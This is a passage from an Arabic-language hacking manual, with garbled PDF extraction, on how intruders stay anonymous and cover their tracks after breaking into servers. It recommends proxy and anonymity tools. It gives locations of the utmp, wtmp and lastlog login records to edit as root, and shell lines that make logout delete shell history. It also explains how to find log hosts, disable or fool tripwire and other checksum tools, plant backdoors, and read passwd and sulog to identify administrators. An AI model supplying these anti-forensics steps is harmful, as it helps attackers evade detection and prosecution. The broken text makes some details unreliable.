Socksتقریبا Host مثل WinGateلكنالاختلا ف وهوان السوكسیتصل من خلالالمنفذ 

وتستطیع التحكمفیه من خلالالاعدادالموجودةفيالمتصفح وذلكامافي 

وهذه الطریقةتستخدمكثیرافي Mirc وتقومبحمایتك 

وبإ خفاء ip الخا صبكوتعملك FireWall 

وستجدونه 

وهنالكالعدید منالبرامجالتيقدتساعدفي عملیةالتخفي مثلبرنامج 

حتما مناولالنتائج من خلال عملیةب حثبسیطةفي جوجل 

١٠٨٠ 

explorer أو 

Ghost Surf 

... 

Socks Host وبإ مكانكإ ضافة netscape 

٤٣


" 


" حمایة هویتك في النت 


$$$$$$$$$$$$$$$$ 

الكاتب MaXhAk2000: 

$$$$$$$$$$$$$$$$ 

::: 

حمایة هویتكفيالنت حتىتصبح مجهولا.‏ 

************************************************** 

هذا هو صلب الموضو ع والذي یأخذ الجانب الأهم>‏ صار مسلسل==‏ 

یشغل هذا الجانب الأهمیة الكبر ىلد ى الهاكر المحترفین وغیرهم من عدم ملاحقتهم عنداختراقهم وغیره 

ولعدمتعرضهمللمقاضاةفي المحاكم والسجون 

لهذاهناكقاعدةتقول ‏""">>احم نفسكقبلانتهاجم""">تنبهلناضعلكم 

. 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 

‎٣‎‏-هناك طریقةاخر ىلجلبالبروكسیات 

استخدامبرامجالب حث عنالبروكسیات ومنها proxy hunter وبرنامج وغیرها 

الوصلةلكنانتم علیكم البحثفي



‏،لبنان ، 


مبهمه غیر حقیقه مثلا ‏(فرنسا ‏،كوبا،العراق مصر،‏ افریقاالجنوبیه ( وهكذالكيیتمأخفائك بكل 

سهوله وبساطه.‏ وكذلك من میزات ستیجانوس حذ ف خطوات التجسسالمخزنهفي حاسبتك الخاصه 

بتصفح الأ نترنتأو نظامالتشغیل(‏ الویندوز ). وأمورأخر ى یجدربناالاشارهالى بعضها : 

‏-تنكیروتغییر رقم الأیبيالحقیقي الخا صبكلكي لایمكنكشفك ومعرفههویتك.‏ 

‏-مسح خطوات التجسس الناتجه منتصفح الأنترنت وخطوات نظامالتشغیل.‏ 

وغیرها منالمزایاتجدونهافي الشرحفي م نتدیاتبوابةالعرب 

http://www.arabsgate.com/vb/showthread.php?threadid=215946 

. 

... 

‎٣‎‏-استخدامبرنامجJAP 

هذا البرنامج یقومبجعلك تتصفحالأنترنتبدونبركسيتكونكل المواقع مفتوحة وهذا البرامجانا مجربة 

وشغال میه میه>>>‏ خطوات عمل البرنامج>ارجوا عدماستخدامهفیما لا یرضيااللهعز وجل


‏"احمي نفسك وغطي افعالك 

" 


$$$$$$$$$$$$$ 

الكاتب:‏ DJ KING 

$$$$$$$$$$$$$ 

هذاالموضو ع سیجعلكتخا ف من خیالكوتعملال ف حسابلظلك ‏..لكنانشاله سیكون دفعهللامام ولیس 

لانتخاف و تتراجع 

اسلوب الموضو ع غ ریب .. و عادة مانتجنبه دائما ‏..بمعنىاخر ‏..كل مناخواننا واساتذتنا من كتبوا 

دروسا و شروحافياختراق السیرفرات والمواقعكان همهمالوحیدفيالحمایه هو مسحاللوق log 

لكن هل هذا یجعلكفيامانتام ؟!هل هذا سیمنع تتبع اثرك ؟!!‏ هذا ما ستكتشفه بعدالانتهاء من 

قراءةالموضو ع 

.. 

!! 

" 

) 

files .. 

.. 

************************ 

!! 

اذاكن تتظنانال حصول علىترجمة الثغرات ) exploites ‏)باسر ع ما یمكن هو ما یجعلك محترفا و 

متطورافاسمحليباناقوللك ‏"انكانسان خاطئ واناسلوبتفكیرك غلط 

ماذا ستفیدك الثغره الحدیثه جدا ) ٠ dayعندمایتمالقب ض علیكاذا هاجمتاحد ىالسیرفراتالكبیره 

؟ و عندها سیتمالسیطره علىاجهزتك وادواتكو مراقبتك ‏!؟!‏ 

یمكن یر ىالبع ضان هذالمبحد ثقط لاي شخ صنعرفه ؟اوانبلادنالی سفیها هذهالتقنیاتالعالیه 

لكن هذاقد یحد ث یوم ما 

وایضاانتلاتهاجمفقط سیرفرا تبلدكانما سیرفراتاخرى عالمیه محمیه منقبلالشرطهالدولیه ‏..كما 

انه لابد منالحر ص وفهمالاموراذاكنتتریدانتسمي نفسك هكر hackerبمعنىالكلمه 

ربماتعتقدفي نفسكانك اكبر منقراءة هذاالموضو ع بكثییر لانك منالمعروفین عنهمبالاحترا فاوانك 

تر ى ذلكفي نفسك ‏..لكنانااؤكدلكبانك مخطئ وانتتحتاجلقراءةالموضو ع اليالنهایه 

************************ 

: 

================= 

الموضو ع مقسمالى ‎٨‎اجزاء 

( 

: 

الجزءالاول ‏:المقدمه ) وهو ماقدقم تانتبالانتهاء منقرائته حالیا 

الجزء الثاني ‏:الامورالعقلیه وكی فتصبح " Paranoid "** هذا الجزء سیتم عرضه من خلال هذه 

المواضیع 

‏-الدافعاوالحافز 

‏-لماذاان لابدانتصبح " Paraniod " 

** 

‏-كیف یمكنانتصبح " Paranoid ‏"؟ 

‏-وكی فتحافظ علىاسلوبك الجدیداو شخصیتكالجدیده ؟!‏ 

.. 

( 

- 

- 

متاكدانمعظمكمیتسائل عن معنى هذهالكلمه سیتمتوضیحمعناها و مفهومها مع شرح هذا الجزء 

انشاءاالله.‏ 

الجزء الثالث ‏:الاساسیاتالتي یجب علیكمعرفتهاقبلانتقومباي عملیةاختراق ‏(و سیتم عرضها من 

خلالالنقاطالتالیه 

تمهید 

‏-امن نفسك 

حسابك الخا ص 

‏-ملفاتاللو قLoGs 

٤٦




‏-لا تتركاي اثر 

‏-امور واشیاء یجبتجنبها و ال حظر منها 

الجزء الرابع ‏:التقنیات الحدیثه اليیتي یجب ملاحظتها ) و سیتمعرضه من خلال النقاطالتالیه 

تمهید 

‏-امنعتقفى اثرك مناي نوع 

‏-ایجاداي نو ع منانوا ع ملفاتاللوق lOGs مهماكانفیها منتلاعب 

( 

.. 

‏-تحقق منlogfile syslog configuration and 

- 

- 

: 

: 

- 

تحقق من نوعیاتبرامجالامن المثبته 

تحقق من وجودالمدراءAdmins 

‏-كیف یمكنتص حیح checksum checking software 

- حیل المستخدمالامنیه 

الجزء الخامس ماذاتفعلان وضعتتحت المراقبه 

الجزء السادس ما الذي علیكالقیامبه وایضاالذي لابد من عدمالقیامبهفي حالةانهتمالقب 

الجزء السابع ‏:قائمهبافضل البرامجللتخفي والاختباء 

الجزء الثامن ‏:كلمه ختامیه ‏........ارجوان تتابعو الموضوعبحر ض وتركیز شدیدن منالان 

ض علیك 

!!! ... 

*************************************************************************************** 

: 

======= 

: 

************* 

.. 

الجز الثاني 

‏-الدافع و الحافز 

لابد منت حكیم العقلللنجاحفياي عمل ‏..العقل هوالقوه التي ستدفعك وتحفزك لتصبحانسان واقعي 

مسئول و حری ص 

المخترق ) Hacker ( الناجح لابد وان تتوفرفیه هذه المبادى ء و الامكانیاتالعقلیه مثلها مثلبناء 

عضلاتالجسملن یكبر الجسم ویتقسمالا بعد ممارسةالریاضه الخاصه بذلك ) على سبیلالمثال 

مهماكنت متمرساولدیكالكثییر منالمعلومات لابداخذاشدالاحتیاطات و الحذرقبلالقیامباي شئ 

( 

.. 

‏-لماذا یجبانتصبح " Paranoid ‏"؟ 

*************************** 

" " Paranoiaفياللغهالانجلیزیهتعني جنونالارتیاب 

( 

) نزعه عندالافرادتجعلكتشكفي جمیع 

كلمة 

الامور و جمیعالاشخا ص 

اعتقدانالاموربدات تتضحلنا بعدمعرفةاصل هذه الكلمه 

یمكنان نلخ ض ما ذكر من خلالالكلماتالتالیه paraniod ‏:تعنيانتصبح شدید الحذر والشكفي 

جمیعالظرو ف 

لماذا یجبتوخي الحذربهذهالطریقه المخیفه ؟!!‏ 

.. 

.. 

.. 

لانتوقعك دائما الىاسوءالظرو ف یجعلكتسیرفيامان .. و لان ماتفعله هو شئكبییر جدا ماتراه 

انت بعینك المجردهانكتغیرالصفحهالرئیسیه اوتقوم بتحمیل بع ضالمعلومات منالسیرفرهو شئ 

بسیطبل و سهل جدا 

ماذالوانكاخترقت سیرفرمعین وتم رصدك و تتبعك و القب ض علیك منقبل الشرطه ‏!؟!‏ وانك سترمى 

في السجنكالسارقین والمجرمین 

انكنت لاتهتمبماقد ی حصللك .. علیكالاهتمامبما ماقد یصیباهلك ‏..ابوك ‏...امك ‏..اخوتك .. 

٤٧


زوجتك واطفالك ‏(انكنت متزوج ( 

ربمالاتشعربان ماتقومبه هو جریمه ‏..لكنفيالحقیقه هي جریمه 

هلتعر ف ماذا سینتظركانتم القب ض علیك ؟!‏ 

سیتم حرمانك منكلامورالكومبیوتر نظرة الناسالغییر طبیعیهلك ‏(لیست نظرةاعجابانما نظرة 

خو ف ( ‏..لنت حظى بفر صالعمل التيتستحقها .. ستسدعى عند حصولاي مشاكلاخرى من هذاالنو ع 

‏..لذافانمعظم منیسقطون لا یقومونثانيابدا 

!! 

!! 

.. 

لذافاصبح حذرا جدا و شكاكا ‏..امن نفسك 

اخذ جمیعالاحتیاطات 

لاتهتمبماقدیقولهالكثیرون عنكبانك خوا فاو ما شابه 

اهتمباي مل ف log مهماكان تقیمتهتافهه 

لتصبح hacker علیكانتقوم بعملك سلیما 

% ١٠٠ 

.. 

كی فتصبح " Paranoid ‏"؟ 

********************* 

( 

) 

اذاكنتقرأت ما سبق واقتنعتبهانتبالفعلاصبحت هذا الشخ ص " Paranoid ‏"لكنالاقتناع وحده 

لا یكفي و التحمس وحده ولید الل حظهایضا لایكفي ‏...انما لابدان یكونالقلق و التوتر موجودینبشكل 

دائمفي حیاتك الالكترونیه 

اذاكنت فعلاتریدانتكون هكر حقیقي ... لابدانتعر فلمنتقول هذهالحقیقه وكی ف تتعامل معالاخرین 

‏..اعمل حسابانك مراقب دائما وانه هناككامیرا خفیه وراك دائما ‏..فاحذرفيكلامك على الهات ف لانه 

قد یكون مراقب ‏..او حتىبریدیكالشخصي والالكتروني ) لابدانتعمل حسابالغیرالمتوقع)‏ 

اذا ماقد ذكرته لا یهمك وانكانسان غیر مبالي ‏..دعنياسألك هذهالاسئله ؟ 

هلتریدانیراكالاخرین مجرم ؟ هلتریدانتر ى الحزن و الدمو ع على وجهاهلك ؟هلتریدانت حسر 

قلوبهم علیك ؟!‏ 

هلتریدانتفقداصدقائك ؟ خطیبتك ؟ صحبتك ؟ 

تذكران الضررلنیعود علیكفقطانما سیعود علىكل منتعرفه 

‏-وكیفتحافظ علىاسلوبك الجدیداو شخصیتكالجدیده ؟ ! 

****************************************** 

بما انكقداستوعبت ماذكر حتىالان وقرر تانتكونانسان حری ص جدا .. لابدانتبقى هكذا طوال 

الوقت 

وتذكر هذه الكلمات ‏:ل حظةكسل واحدهفي اتخاذالاحتیاطاتالامنیهقدتغیر حیاتكباكملها ؟!!!!‏ 

دائماتذكر الدافع 

‏-الجزءالثال ث:‏ 

========= 

- 

****** 

تمهید 

یجبمعرفة هذهالامور القادمه واستیعابها جیداقبل ممارسةاي عملیةاختراق .. حتىلوكنت مخترق 

متمرس لابدانتستوعبالافكار القادمه 

٤٨




: ‏-امن نفسك 

*********** 

‏-ماذالوقرأال SysAdmin 

رسائلك البریدیهالالكترونیه ؟ 

‏-ماذالوكانت اتصالاتكالهاتفیه مسجله و مراقبه منقبلالشرطه ؟ 

‏-ماذالوتم ضب طالكومبیوترالشخصي والسیطره علىكلمعلوماتك ؟ 

اذاكنتلاتقوم بعملاي اتصالات هاتفیه معاي شخ ص منالهاكرزاو الكراكرز .. ولاتبعثايایمیلات 

فیهمعلومات مشبوهه و لاتمتلكايمعلوما تامنیه و حساسه على جهازكفهذا ببساطه لا یشكلاي خو ف 

لانه ببساطهایضاان تلست مخترقاو(=‏ hacker 

لانه لابد من وجود اتصالبینك وبیناصدقائكالمهتمینبهذا المجال الاخبار والافكار 

كماانه لابد وانكتمتلك بع ضالملفات اللازمهللاختراق او بع ضالمعلوماتاليتعبر مدینهلكفي حالة 

حدو ث رصدلجهازك ‏(كبسه 

.. 

.. لتبادل 

( 

< -- 

--> 

قم بتشفیركل ماتملكه منمعلومات حساسه sensitive data 

یمكنك ذلكباستخدام بع ض البرامجالموجوده مجانا علىالانترنت .. و هذهقائمهبافضل البرامج و التي 

تعتبراختیار الهاكرزالاول : 

‏-لمستخدمین MsDos الیكم v.17 SFS او‎1.4b SecureDrive 

‏-لمستخدمین نظام Amiga* الیكم * ( v1.5 EnigmaII 

( 

‏-لمستخدمینانظمةال Unix الیكمv1.33‎ CFS 

خصوصافي عالمنا العربي 

احدىانظمةالتشغیل غیر شائعةالاستخدام 

لتشفیر الملفا تبشكلفردي 

مل فبمل ف ‏)الیكم هذه البرامج ‏(الاكثر شهره والاحسناداء 

: ( 

) 

- Triple DES 

- IDEA 

- Blowfish (32 rounds) 

- file2file 

لتشفیرالایمیلات:‏ 

-PGP v2.6.x 

یمكنكایضاتشفیر عملیة اتصالك ب ( System Unix علىاساس انه ممكنانتكون مراقب 

و ذلكباستخدام 

( 

.. 

.. 

٤ 

: 

SSH ‏-الامن حتىالان 

- DES Login 

غیر شائعه ‏..لاتوجدفيالقوامیس ‏..لكنفي نفس 

غیر منطقیه اجعلكلماتكالسریهصعبةالتخمین الوقت لابدان تتذكرها دائما 

اخترها من كتاب تتمتلكه .. اجعلهااكبر عدد ممكن منالاحر ف ) یعني عادة عند عملاياشتراك یطلب 

‏-‏‎٨‎احر ف ‏)فاخترال ٨ حرو ف 

منككلمه سریه تتكون من ٤٩




لاتحفظارقام هواتفاصحابك الهاكرزبشكلاعتیادي ‏..انما یمكنكبانتشفرها 

فق ط ( و اتصلبهم منهوات ف الشار عاو منالعمل 

اذاانتبالفعل متعمق جدافيالهاكینجفلابد منتشفیركل شئیتعلقبهذهالامور 

احفظ دائما نسخهاحتیاطیه منمعلوماتك على CD او HD وبالطبعتكون مشفره حتىاذا خسرت 

المعلوماتالموجوده على جهازك یكونلدیك نسخاحتیاطیه 

ملفات مطبوعه و لاتریدها مرة 

لاتحتفظبملفاتلاتحتاجها 

اخر ىلاتقطعهااعتیادیاانمااحرقهافي مكان بعیدكل البعد عناماكنتواجدكالاعتیادیهاواناردت 

الاحتفاظبهافعلیك كتابتها من جدیدباسلوب مرمزاو مشفر لایعرفهالاانت !! 

هلتعر فانه منالممكنان 

) حتىبرموزتفهمهاانت 

!! 

.. 

.. وانكانلدیك document files او 

: 

================= 

، المخابرات 

: 

تكون مراقب من ‏:الشرطه ‏،هاكرزاخرون وانهمیتسطیعون رصدكل حركاتباستخدام 

وسائل حدیثه لایمكنتخیلها 

مثل 

‏-اجهزهتصویرتستطیعتصویرك عند بعد مئاتالامتار 

‏-نقطةلیزر مصوبه نحو غ رفتكللتصنت على مكالماتك 

‏-موجات عالیة الترددللتنص ت علىلمسات و صوت یدیك علىال!!‏ keyborad 

تختل فبالطبع هذهالامكانیات من مكان لاخر و من دولهالىاخرى .. ویر ىالبع ضانهفیمااقوله مبالغه 

‏!!!لكنانتلاتعر ف ماذا یخبئلكالمستقبل ‏!!فلماذالاتستعد منالان 

كماانه هناك الكثییر مناخواننا العربفي دول الخارج الذيبالفعل تتوفرفیهااجهزةالتنصت هذه 

على رايالمثلالمصري ‏"امشي عدل یحتار عدوكفیك ‏"فكلماكنتاحتیاطیا و حركاتكت حسبهابشكل 

ص حیح ‏!!!ففر صاطاحتكقلیله جدا 

... و 

!!! 

حساباتك واشتراكاتالشخصیه 

: 

: 

=================== 

هنا سأتكلم عن حساباتكالشخصیه سواءكانتفي العمل\‏ المدرسه\‏ الجامعه\ايكانفعلیكبالتالي 

‏-ابدا لاتقومباي عمل غییرقانوني ‏..او مشبوهب حسابتكالشخصیهالتيفیها یكوناسمكالحقیقي و 

هویتك وتفصیلاتكامله عنك 

‏-عمرك ماتحاولان تتصلبموقعقدتماختراقهبواسطةال telnet 

‏-یمكنكالاشت راكب حسابك الخا صفيقائمة البرید لاي موقعامني security من دون خو ف 

.. 

- 

- 

- 

لكنكل مو هو مخت صبالهاكینج من ملفات لابدانتشفراوانهایتم مسحهافورا 

ابدا لاتحفظايبرامج وادواتالاختراق على الهاردیسكفي حسابكالشخصي 

بریدكالحقیقي لاتعطیهالالمنتث قفیهثقه عمیاء 

‏-اهتمامكبالسكیورتي لایجعلك مشبوها ‏..انماالاهتمام بعكسالسكیورتيهو المشكله == ‏



! 

- UTMP 

- LASTLOG 

للمتواجدیناونلاین حالیا 

تسجیل مناین جاءت هذه logins 

‏**سنتكلم عنهمباستفاضهوتعم قفیما بعد ‏(فيجزءاخر من نفسالموضو ع 

( 

: 

!! 

كل عملیة دخولبواسطةال telnetیتمتسجیلهافي , ftp , rlogin هذهالملفات .. لابد حذ ف دخولك 

من هذهالملفات والا سیتممعرفةالاتي 

‏-ماذاقمتبالاختراق 

‏-مناي مكانانتقادم 

‏-كم من الوقت بقیتاونلاین..‏ 

( و 

خطا یقعفیهالجمیعبنسبة % ٩٩٫٩ 

.. 

مننا ) حتىاناكنتاقعفي نفس هذا الخطا زمان ‏..لكن اتعلمت 

هوانكتمسحاللوقات logfiles 

علطول .. هذا مجديفي حالةانك لاتهتمبانیعر فالادمینانه هناك مخترق ماقد دخل علىالنظام ‏..اما 

اذاارد تانتشتغل شغلالمحترفین علیك الدخول و الخروج دونان یلاحظكاي شخ ص ‏..دون انتقوم 

بتغییراي شئ یلف تانتباه مدیرالنظام 

و لعمل ذلكتابعمعي : 

لاتعتمد البرامجالتي روجت علىانهالاتقومبمسح اللوقانماتقومبحذ ف دخولكفهي غییر مجدیه مثل 

برنامجZAP2‎ ZAP (or 

لانه یقوم بعملاصفاركاخرلوق مكانك انت و هذاایضا دلیل على وجود خطا سیلاحظه مدیرالنظام 

اذا علیكبالقیام بذلك یدویا 

عادة لابدانتكوت root لتغیروتعدلفيال ( files logباستثناء بع ض التوزیعاتالقدیمه جدا 

اماكنتواجد ملفاتاللوق ( defaultتختل فباختلا ف التوزیع 

( 

( 

UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log 

WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log 

LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log 

وفي بع ض النسخالقدیمه$‏home/.lastlog 

لا تترك اثرا:‏ 

======= 

كثییر من الهاكرز ینجحونفي عملیة حذ ف دخولهم من ملفاتاللوق 

و هيالملفات التيتوجد هنا 

/tmp and $HOME 

و جودال Shellفي History HOME$ مصدرقلقكبییر 

‏..لكنهم ینسونامرا هاما وقاتلا 

!!! 

: 

History files : 

sh : .sh_history 

csh : .history 

ksh : .sh_history 

bash: .bash_history 

zsh : .history 

Backup Files : 

dead.letter, *.bak, *~ 

٥١




لكن الحل موجودایضالمسحال : files History 

mv .logout save.1 

echo rm -rf .history>.logout 

echo rm -rf .logout>>.logout 

echo mv save.1 .logout>>.logout 

!!! 

23 http://www.host.com/ 

( 

.. 

.. 

‏-امور و اشیاء یجبتجنبها وال حظر منها 

====================== 

لاتقومابدا بكسرايباسوردالا على encryptedكما partition علیك دائماانتتحذر مناستخدام 

اشتراكاتك ( اشتراكالجامعه على سبیلالمثال 

لانهبم نتهى البساطه یمكنان یرى ماتفعله مدیر الشبكه admin و منثم سیعر ف مالذيتقومبه و 

الملفات التيتستخدمهاالخ 

حاول دائماانتغییراساميالبرامج المشبوههلدیكیعنياحناالعرب خصوصا غاویین نسمياسماء 

اسامي مخیفه علىالفاضي 

لاتفكرفي نفسكفقط .. یعني حینانتستخدم بع ضالاشتراكاتاوال shellsالتيتسمحبالعملالخلفي 

backgroundلابدانتعر فانكتبطئ من سرعةالسیرفر وبالتاليتلفتالانظار 

حاولانلاتستخدم parametres علىقدرالمستطا ع ... على سبیلالمثالاذاارد تان تتصل منالشیل 

علىتیلنتلموقعمعیناو سی رفرمعینلاتقوم بعملالاتي : telnet 

انما ببساطه اتبع الخطوات البطیئه وهي 

telnet 

open 

http://www.host.com/ 

و هكذا .. 

في حالةانكاخترقت سیرفرمعین منالافضلانتضع علیه backdoors مخصصهلنظام التشغیل 

م ش sub7‎هههههههههه ( و هيكثییره و موجوده مجانا علىالانترنت 

الجزء الرابع ‏:التقنیات الحدیثه اليیتي یجب ملاحظتها 

) 

=============================== 

- 

******* 

تمهید 

: 

بعدانثبتاول sniffer و خططتلبداالاختراقات .. علیكانتعر فكی فتستخدم هذهالتقنیات متعبا ما 

یلي 

‏-امنعتقفى اثرك مناي نو ع 

... 

!!! 

********************** 

) 

قد یلاحظ الادمین مدیر الشبكه ( وجودككمخترق hacker وانكاطحتباحدالمواقعلكن هذا لایهم 

المهمهوانهكی ف سیرصدك و عندهاكیف یمكنانیتعاملمعك 

لذاففي هذا الجزء سیتمتوضیحكلالاحتمالات والاسالیبالذي یمكنبها تتبعك و رصدك وایضاكی ف 

یمكنانتمنعها ... 

admin ) ) 

‏*منالطبیعي ‏(العادي ‏)ان یسهل على مدیرالشكبه معرفة النظامالذيكانالمخترق علیه 

عند دخوله على شبكتهو ذلكاما عن طریق ملفاتاللوق ) هذاانكانالهاكر غبي لتركهاكماهي ‏)او من 

ال output منال sniffer 

٥٢




او مناوامر netstatفي حالةان المخترق مازال موجودا online 

من اجل هذاتختاجال !! Server GateWay 

.. 

A gateway server in between ‏*هذا واحد منالكثییر من السیرفراتالتي یوجدلك حساب 

علیها والتيتعتبرفي منتهى السخافهفيالاستخدام وانتتحتاج لانتكون رووت علیها لتستطیعتغییر 

ال wtmp and lastlogs 

كماانه لابدان مناستخدام اكثر من gateway server وانتبدلبینهمباستمرار حتى لایتم الكش ف 

عنك 

منالشیل الذي ستخترق منه ‏..قمبالاتصالبال gateway server و منثم تتصلبالسیرفر المراد 

اختراقه 

تحتاج دائما 

باستخدامك ل Dialupیجنبكالكثییر server من المشاكل حیثانكفي غنى عن التعدیلفي ملفات 

اللو قبشرطانتدخلباشتراك مختل ففيكل مرهتدخلفیها علىال (= system hacked 

ملحوظه ‏:اذاكنتقادر علىالاتصالبسرفیرات dialupكثییرهفلا حاجهلانتستخدم hacking 

serverلانه سیتغیر اثرك بتغیر الشركات المختلفهالتي تتصل من خلالها 

.. 

ل root access لتغییراللوق)‏ 

.. 

==> ( 

بالنسبهللمتواجدینفيالولایات المتحدهالامریكیه واوروبا ‏(الدولالمتقدمه ( حتى وانقمتبما سبق ( 

) servers dialupیمكنهمتسجیلكل اتصالتم ولدیهمارشیفات منذ سنیین هذا عددها 

نتیجه واختصارللنقطه السابقه موضحهبالرسمفيالصورهالتالیه:‏ 

! 

‏-ایجاداي نو ع منانوا ع ملفاتاللوق lOGs مهماكانفیها منتلاعب..‏ 

************************************************** 

: 

*** 

منالهام والضروري جداانتعثر علىكل ملفاتاللوق حتىالمخفي منها ‏..لل حصول والعثور على هذه 

الملفات یمكن ذلكبهاتینالطریقتین 

١ ‏-ثر على جمیعالملفاتالمفتوحه ‏:و یمكنك ذلكباستخدامبرنامج LSOFهواختصار List Open 

Filesو منثم یمكنالعثور علیهم والتعدیلفیهم 

حث عنكل الملفات التيتغیرت حد ثفیهاتغییر من بعد دخولك - 

( 

) 

-٢ 

بعد دخولكقم بعمل touch /tmp/check و بعدهاقم -print" "find / -newer /tmp/check 

٥٣




العملیه التي سنقومبها ستاذ خالشكلالتالي ‏:ب حث 

نتائج-‏ ‏ تعدیل 

> - 

قمایضابالتشیك علىاماكنال log files الاعتیادیه usr/adm/ و var/adm/ و var/log/ 

.. 

اذایتمتسجیلالعملیاتفيال loghost یعني xx@loghostفانت هنافي مازق حیثانه لابد من 

انتخترقال loghost لتعدل ملفات اللوق 

یمكنتعدیلاللوق logfiles بعدة طرقابسطهاباستخداماي محرر كتابه text editor اوقم بعداسطر 

المل فباستخدام wc و منثم حذ فاخر ‎١٠‎اسطر من 

‏"‏LineNumbersMinus10‎بالعربي ) عددالسطور مطروحا 

مثبت علىالسیرفر یمكنك ببساطهاستخدام acct-cleaner from 

zhartوهوهیعملاللازم 

خلال-‏ "head : 

١٠ منه ) head - 

اذاكانبرنامج accouting 

(= 

اذاكانالنظام یستخدم wtmpx و utmpx ایضافمعالاس فعزیزانتفي ورطه ‏!!!فانا علىاعر ف 

ايبرنامجللتعاملفي هذهالحاله ‏..لواستطع تانتبرمج واحد ‏(للاخوهالمبرمجین ‏)لاتنسىانتعلنابه 

‏-تحقق منlogfile syslog configuration and 

************************************ 

تعتمدمعظمالبرامج علىال syslog function لتسجیلاي شئ یریدونه ‏..فعلیكان تتحقق من 

خصائ صال syslog 

فاذاكانتاللوقات logs لاتخزنفقط علىالجهازانما على hostsاخرى ‏...فیؤ سفني انك لابد من 

اختراق هذهhosts 

ملفال syslog موجودفي/‏etc/syslog.conf 

‏-تحقق من نوعیاتبرامجالامن المثبته 

****************************** 

توجد العدید منبرامجالفح صالأمني غالبا علىالمواقع ذات الحسالأمني العالي.‏ وتدار هذة البرامج 

بواسطهأداهتسمى cron و یكون مكانهاالأفتراضيأوالطبیعي هو var/spool/cron/crontabs/ 

و هيتقومبمتابعه جمیع المدخلات 

. 

الموضوع نستخدمالأمرالتالي 

" crontab -l root". 

خاصهال Rootو الملفاتالتي یستعملها.للتحقق اللسریع من 

غالبا ماتكون هذه الأدوات محمله و عامله على حساب المدیر.‏ و یكون بعضهافي مجلد ال bin/~ الخا ص 

به.كما یمكنان یكون هناك sinnefer موضو علأ غ را ضامنیهفي نفسالمكان.‏ 

منالأدوات ال تتستعملفي مثل هذه الفحوصات الداخلیه 

tiger, cops, spi, tripwire, l5, 

binaudit, hobgoblin, s3 etc. 

- 

ینبغي علىالمقتحمأنیتأكد من وجود هذهالأدوات و التأكد منالتقاریر التيترسلها ‏،للتأكد منأنها لا 

تكشف عملیه الأقتحام 

یمكنكتعدیل مفات هذهالبرامجللتأكد منأنهالنتقومبالأبلا غ عنالأقتحام،و یمكنتنفیذ ذلكبطریقتین:‏ 

قم بتعدیلالبرنامجبرمجیالكي لا یقومبالأبلا غ عنك(واسعه شویه دي)أوقم بأزالته وأستعملبرنامجا 

مزیفا 

‏-قدتضطرإلىأزالهال back door الذيأستعملته ومحاولهتحمیلهبطریقهأخر ى 

٥٤




- 

- 

- 

‏-تحقق من وجودالمدراءAdmins 

**************************** 

منالمهمأنتجد جمیعالمدراء على الموقع ‏،وتحاولمعرفه ال حسابات العادیه التيیتمأستخدامها.‏ 

توجد عده طرقلكشف هذهالمعلومات : 

قم بفح ص المل ف .forword و مدخلات الalias 

أفح ص مل ف ال sulog و حددالمستخدمین الذین نجحوفيتنفیذالأمر suبنجاح root 

أسحب مل ف ال group وأب حث عن جمیع المجموعات التيلها علاقهبالأداره root, ( admin, 

wheel, etc 

‏-أسحب مل ف passwdبالنسبهللمدیر لعر ضكلمات سرالمدراء 

یعدكل هذا ‏،یمكنكمعرفهكلالمدراء علىالموقع.أدخلإلى مجلداتهم الخاصه ‏(في حاله عدمأستطاعتك 

‏،أستخدمأحد ىالأدواتالتالیه ‏,‏chid.cلأنتحال changeid.c شخصیه المستخدم)‏ . وأفح صالملفات 

لمعرفه الأوامر التي یستعملونها عادة،قد یفیدك 

هذافيمعرفه دورالمدیر علىالموقع،أو أكتشا فمعلومات مخفیه.قم بف ح ص ملفات 

لمراجعهأعدادات ال aliasالتيتستخدم ، وإ ذا ماكانتأدوات 

أمنیه خفیه مستخدمه.‏ و من الطبیعي طبعاأنتقوم بفح صكافه الملفات والمجلدات خاصهالمخفیه منها 

قدتجد بع ض الأشیاءالمفیده حقا 

، 

التالیه history/.sh_history/.bash_history 

.profile/.login/.bash_profile 

checksum checking software 

************************ 

برامج checksum 

‏(هوقیمة رقمیة تُ‏ ستعملللتأكد من خلوالبیانات منالأخطاء.‏ هذهالقیمةتُ‏ حسب من 

خلال عملیةكش ف الجمع ( 

بع ضالمدراء ویقمونباستعمالبرامجللتحقق من حدو ثايتغییراتفي الملفات،‏ وفي حالة حدو ثاي 

تغیر ، یقوم بفح ص الملفات ویستطیعاكتشافها 

فكی فتعر ف مااذااستخدمت هناكبرامج التحقق وايالانواعاستخدمت؟ واذاعرفتفكی فتعدلهاب حی ث 

تخدم مناجلك ؟ 

هناكانوا ع عدیدة منبرامجالتحق ق ومن السهل كتابة واحدة منهابنفسك ولكن منالصعب اكتشا ف مااذا 

استخدمت مثلتلكالبرامج عليالملفا تللحمایة 

هذهاسماء بع ضالبرامج التيتقوم ب عملیةفح صchecksum 

SOFTWARE : STANDARD PATH : BINARY FILENAMES 

tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire 

binaudit : /usr/local/adm/audit : auditscan 

hobgoblin : ~user/bin : hobgoblin 

raudit : ~user/bin : raudit.pl 

l5 : compile directory : l5 

... ( 

كماتريهناكاحتمالاتكثیرة،‏ ربماالبرنامج نفسهاوقواعدالبیانات یوجد عليجزء آخر ، مثلجزء 

لمضی فاو جهاز آخر ‏،او حتيقواعدبیاناتالتيتحملمعلومات checksumفي جهاز 

محمي علي الكتابة ‏(اقرا ص CD مثلا 

ولكن یمكنكالقیام بعملیةفح صاستطلاعي سریعلمعرفة البرامج المستخدمة ، واذالمتستخدمففرصتك ، 

NTFS 

٥٥




واذالمتجد شي ولكنككنت متاكدا مناستخدامهم لتلكالانوا ع منالبرامج هذایعنيان الموقعاوالمزود 

محميبشكل جیدا ‏(هاردلك 

( ویجبانلاتعبثبالملفاتابدا .. 

و لكن ماالعملاذا اكتشف تانهم یستخدمونتلك البرامج وبامكانكتغییرها؟؟ 

یمكنك 

١ ‏-ایهامتلكالبرنامجبطرق شرعيبانهتمتغییر مل ف مابشكلقانوني ویتمتحدیثقواعدالبیانات 

" tripwire -update /bin/target". 

مثلا 

‎٢‎ا-‏ نكتغییرقائمةالملفاتالتيیجبف حصها وتزیلاسم الملفات المراد من القائمةفلایتمف حصها مرة 

